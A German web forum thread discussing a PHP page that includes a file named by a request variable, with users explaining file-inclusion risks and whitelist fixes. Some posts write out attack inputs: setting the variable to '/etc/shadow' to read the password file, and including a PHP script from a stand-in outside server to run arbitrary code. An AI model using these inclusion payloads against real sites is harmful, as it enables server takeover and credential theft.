[HaBo]

ba2

Anzeige

Moin Moin

Ich habe folgendes Problem

ich lasse meinen Inhalt der HP so anzeigen

include $seite;

ist $seite jetzt nicht gegeben kommt immer ne Fehlermeldung
wie kann ich eine nicht Deklarierte(schreibt man das so?) Variabel auf irgend einen Wert setzen?

ich habs so versucht

if($seite=="")
{
$seite="inhalt.php"
}



Fehlermeldung

Notice: Undefined variable: seite in /www/htdocs/w005aa58/freak/index.php on line 32

Warning: main(): Failed opening '' for inclusion (include_path='.:/usr/share/php:..') in /www/htdocs/w005aa58/freak/index.php on line 32

geht aber nicht :(

mfg ba2

Elderan

Hallo,
das schlimmst was du machen kannst:
include $seite;

Jeder der etwas Ahnung von PHP hat, kann innerhalb von Sekunden so deinen gesamten Server lahmlegen.

Besser so:

ba2

da hast du wohl recht, habe ich auch schon ma ausprobiert, bei meinen webserver, da ist aber mein IE abgeschmiert und nicht der Server.

2Bios

a propos ie: kennt ihr schon den bug <input type stirbdummerieoderwasauchimmer> in einer html? bis version 6 crasht dieser zuverlässig

flame

Also... als erstes musst du überprüfen, ob die variable überhaupt existiert.

oder eine variable einen Wert enthält.
Wenn du nun überprüft hast ob die variable existiert /einen Wert enthält, kannst d entsprechende maßnahmen einleiten.
Wenn du eine nicht vorhandene variable mit If euf inhalt prüfst, wird dir immer eine fehlermeldung ausgegeben.

Quelle: http://manuals.phpforum.de

Eine mit Post oder Get übergebene variable zu includen is müll, weil man so jede seite includen kann.

je nach anforderung / umfang kannst du folgende muster benutzen:

Hier wird für jede datei, die aufgerufen werden kann ein eigener includebefehl geschrieben. So kann man nur seiten includen, die auch in deiner IF-Abfrage definiert sind.
Hier definierst du ein array, in dem alle abrufbaren seiten definiert sind. danch wird überprüft, ob site einen in ar_sites defineirten wert enthält. anschließend noch ".php" anhängen.
oder nochmal ein array mit mehr aufwand. Hier wird die seite direkt im array definiert, und der wert im key

Aber eigentlich ist es immer schlecht, ne variable an den include-befehl zu übergeben, da es in gewissem maße ang

Eine bitte noch.. nimm nicht einfach den code hier, sondern versuich zu verstehen was er bewirkt. es gibt nix schlimmeres, als ein Programm, das aus leuter Codeschnippseln besteht, von denen man nicht 100% versteht, was sie bewirken.

BattleMaker

Funktioniert nicht.

@Elderan: Wie sollte man einen Server lahmlegen, nur weil man das Inkludieren jeder x-beliebigen Datei zulässt? Man könnte sich vllt. ein paar Textdateien aus übergeorndeten Verzeichnissen angucken aber mehr doch auch nicht - dachte ich jedenfalls.


MfG, BattleMaker

flame

naja, der Server wist du damit i.d.R. nicht lahmlegen können, aber wenn du jede beliebige datei includen kannst, kannst du z.B. auch die site sich selbst includen lassen. was dazu führen kann(!!!), dass eine endlosschleife entsteht.

Oder stell dir folgendes szenario vor.. Jemand hat auf seiner seite einen uploadbereich. dort kann ich nun ein php script hochzladen und es über den include-befehl einbinden. So lässt sich jeder beliebige code ausführen.

BattleMaker

Ah danke...

Dazu müsste aber erstmal ein sehr inkompetenter Admin her

Was mich nur verwundert hat, war Elderan's Äußerung:
Deshalb die Nachfrage


MfG, BattleMaker

flame

Naja.. inkompetente Leute gibts doch an allen ecken zund enden. vielleicht gehör ich ja auch dazu.

Das ist das Prinzip des Jeans-Managements: An jeder wichtigen Stelle eine Niete!

aber ich mein, vielleicht weiß er was, das wir nicht wissen. Mal sehen vielleicht erfahren wir nochwas.

Elderan

Hallo,
Server lahmlegen:

--------------------------------------------------------------------------------
include($seite);
$seite = "/etc/shadow";

=> include("/etc/shadow");
Liefert bei manchen Servern die Passwortdatei

$seite = "http://meineurl.de/script.txt";

=>include("http://meineurl.de/script.txt");
Includet einen beliebigen Script von meinem Server.
Da der Text aber __nicht___ als Text geladen wird, werden ggf. enthaltenen PHP Code ausgeführt wird, so kann ich so beliebigen PHP Code ausführen.

Kannst es ja Test.

locahost:
<?php
include("http://meinserver.de/script.txt");
?>

Und dann auf deinen Server script.txt hochladen, die <?php //Code ?> enthält.

Also ein Angreifer kann in Sekunden schnelle, _deinen_ Webserver beliebigen PHP Code unterjublen.
Als Folge könnte ich so z.B. die Datei mit den Zugangsdaten der DB auslesen:

script.txt:
Mit den Zugangsdaten könnte ich dann deine gesamte DB löschen bzw. manipulieren.

Desweiteren könnte ich alle Dateien auf deinem Account bearbeiten, manipulieren, löschen, oder einfach illegale Dateien auf deinen Server/Account hochladen.
Auch könnte ich diesen dazu benutzen, andere Server anzugreifen.

Ich habe dann genau die gleiche 'Macht' wie du, nur dass ein findiger Angreifer besser weiß welche Befehle 'schädlich' sein könnte.

Man könnte ja ein Script schreiben, welches deine DB flooded, als Folge könnte die gesamte Datenbank zusammenbrechen, und der Serveradmin würde sich freun.

Oder ich veränder deine Index nicht sichtbar, allerdings ist dort jetzt ein Exploit, welchen den User z.B. ein Trojaner unterjubelt.


Desweiteren sind extrem viele Server schlecht abgesichert, so dass ein Angreifer über dein Script oft den gesamten Server unter Kontrolle bringen könnte, oder einfach nur Daten ändern/löschen von anderen Accounts (z.B. Shared-Hosting).

Die Möglichkeiten sind vielfach.

Vorallem wenn du durch solche Attacken reale/finanzelle Schäden bekommst.
Stell dir vor, dich verklagt jmd., weil deine Seite Trojaner verteilt, oder du wirst angezeigt, weil auf deinem Server Kinderpornographie ist.

Oder jmd. ändert deinen PHP-Script /System so, dass dieser davon ein Vorteil erziehlt.

p-Logic

Bei einfachen Seiten nur DoS, aber wenn die Seite z.B. noch die Zugriffe loggen soll...

Datei auf dem Server:
andere Datei
Obwohl diese Variablen für niemanden sichtbar sind, kann sie jedes script, dass auf dem selben Server liegt und als $seite eingegeben wird benutzen (manchmal berechtigt).

Wenn man jetzt noch eine Möglichkeit findet die zweite Datei irgendwo auf diesen Server zu laden (z.B. durch schlecht gesichertes Image upload-script, etc.) kann man diesen Log beliebig verändern.
(allerdings könnte man dann evtl auch eine Datei aus dem Array ersetzen)

(Klingt trotzdem ziemlich Paranoid )

Ein weiterer (besserer) Grund darauf zu verzichten:
www.WebpageOfBa2.de/test.php?seite=inhalt.php
http://www.WebpageOfBa2.de/test.php?...E-Exploit.html

Jeder beliebige Content kann deine Seite als Relay benutzen.
Von ImageCrashs bis illegal Volksverhetzendem. Alles "auf" deiner Website.

BattleMaker

Eines erstaunt mich. Ich hielt diese Lücke nämlich bisher für so offensichtlich, dass ich mir gar nicht die Mühe machte, auszuprobieren, ob es funktioniert. Aber nach eurer Erklärung kann man anscheinend per include() Skripte von ganz anderen Servern (obwohl diese Skripte ja ebenfalls SERVER-seitig sind) ausführen.

Ich meine, das KANN doch gar nicht funktionieren! Man nehme z.B. an, ich hätte folgendes Skript:

www.RobertNitsch.de/hack.php

Wenn ich jetzt einer beliebigen (natürlich nicht geschützten) Seite http://www.xyz_zyx.de/include.php?pa...ch.de/hack.php übergebe, dann wird doch zuerst das Skript hack.php auf MEINEM Server ausgeführt und dann wird die AUSGABE des Skripts in www.xyz_zyx.de/include.php inkludiert (durch include($_GET['inc']);), nicht das Skript selbst, sodass es auf dem Server des Opfers ausgeführt wird.
Denn mein Server lässt doch schließlich niemanden an den Source meiner PHP-Dateien ran. Wäre ja noch schöner, wenn ich mir mit diesem Trick den Code von anderen Seiten anschauen könnte.

Und mit einem inkludierten JavaScript (was ja wieder möglich ist, denn JS läuft ja CLIENT-seitig ab) kann man keine Datenbanken löschen, höchstens ein paar dumme Menschen ausloggen und auf eine falsche Login-Seite lenken.

Deshalb zum besseren Verständnis nochmal ein Zitat (Elderan):
Heißt das, dass ich einem nicht geschützten PHP-Skript eine TXT-Datei andrehen kann und PHP das dann als PHP-Skript ansieht? Bzw. evtl. enthaltene Befehle?



MfG, BattleMaker

Kimmmey

Ja, wenn du mit include eine *.txt datei lädst und in dieser php Code steht wird dieser vom Server ausgeführt. Egal wo sie liegt(auf anderem oder dem selben Server).

Wenn du eine *.php Datei eines anderen Servers lädst wird die auf dem anderen Server verarbeitet und du bekommst nur den HTML Code welcher zurückgegeben wird.

Hoffe das stimmt alles so

flame

Also dass man tatsächlich auch scripte fremder seiten einbinden kann, ist mir auch neu. aber es funktioniert tatsächlich.
Was aber nicht funktionieren dürfte, istd ie sache mit "/etc/shadow", aber bei schlecht configurierten system wäre es natürlich theoretisch schon möglich.. sowas darf aber einfach nicht vorkommen.

Wieder was dazugelernt. Ach ja, und SO stell ich mir ne Habo-Diskussion vor!

ba2

Also ich hab das mal ausprobiert und bei mir funzt es nicht

ich habe ne datei angelegt

test.txt

inhalt--->
----------------------
<?php
echo "TEST";
?>
----------------------

und dan das ganze an der variabel rangehangen

http://www.domain1234567890.de?seite...89.de/test.txt

und es ging nicht